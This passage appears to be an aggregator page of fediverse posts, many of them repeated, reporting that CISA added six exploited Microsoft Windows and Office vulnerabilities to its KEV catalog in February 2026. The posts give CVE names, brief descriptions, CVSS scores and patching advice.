- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:01:38.000Z ##

CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

0x3e4@cyberplace.social at 2026-02-10T22:45:41.000Z ##

🔐 CVE-2026-21525
CVE-2026-21525

Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.

📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

cisakevtracker@mastodon.social at 2026-02-10T19:01:38.000Z ##

CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21510
(8.8 HIGH)

EPSS: 6.40%

updated 2026-02-10T21:31:29

13 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

mastokukei@social.josko.org at 2026-02-11T09:02:11.000Z ##

age-verification concerns.
- Windows security flaws: multiple 2026 CVEs (Notepad RCE CVE-2026-20841; MSHTML; CVE-2026-21510/13/19/25/33) and ongoing Patch Tuesday updates.
- AI and work: productivity boosts but rising cognitive load and burnout; AI adoption altering job markets and roles.
- Open/indie web and OSS: growing use of Pixelfed, Matrix, Zulip; open-source Discord alternatives (Stoat chat); broader Fediverse/indie-web movement.
- Space/AI funding and policy: [2/3]

##

thehackerwire@mastodon.social at 2026-02-10T23:38:12.000Z ##

🟠 CVE-2026-21510 - High (8.8)

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:46:54.000Z ##

🔐 CVE-2026-21510
CVE-2026-21510

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:01:53.000Z ##

CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

thehackerwire@mastodon.social at 2026-02-10T23:38:12.000Z ##

🟠 CVE-2026-21510 - High (8.8)

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:46:54.000Z ##

🔐 CVE-2026-21510
CVE-2026-21510

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

linux@activitypub.awakari.com at 2026-02-10T18:55:45.000Z ## Microsoft’s February 2026 Patch Tuesday Addresses 54 CVEs (CVE-2026-21510, CVE-2026-21513) 2 Critical 51 Important 1 Moderate 0 Low Microsoft addresses 54 CVEs in the February 2026 Patch Tuesday ...


Origin | Interest | Match ##

cisakevtracker@mastodon.social at 2026-02-10T19:01:53.000Z ##

CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21513
(8.8 HIGH)

EPSS: 8.83%

updated 2026-02-10T21:31:29

12 posts

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

thehackerwire@mastodon.social at 2026-02-10T23:39:02.000Z ##

🟠 CVE-2026-21513 - High (8.8)

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:45:42.000Z ##

🔐 CVE-2026-21513
CVE-2026-21513

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:01:22.000Z ##

CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

thehackerwire@mastodon.social at 2026-02-10T23:39:02.000Z ##

🟠 CVE-2026-21513 - High (8.8)

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:45:42.000Z ##

🔐 CVE-2026-21513
CVE-2026-21513

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

linux@activitypub.awakari.com at 2026-02-10T18:55:45.000Z ## Microsoft’s February 2026 Patch Tuesday Addresses 54 CVEs (CVE-2026-21510, CVE-2026-21513) 2 Critical 51 Important 1 Moderate 0 Low Microsoft addresses 54 CVEs in the February 2026 Patch Tuesday ...


Origin | Interest | Match ##

cisakevtracker@mastodon.social at 2026-02-10T19:01:22.000Z ##

CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21519
(7.8 HIGH)

EPSS: 1.67%

updated 2026-02-10T21:31:29

11 posts

Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

thehackerwire@mastodon.social at 2026-02-10T23:28:25.000Z ##

🟠 CVE-2026-21519 - High (7.8)

Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:45:41.000Z ##

🔐 CVE-2026-21519
CVE-2026-21519

Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
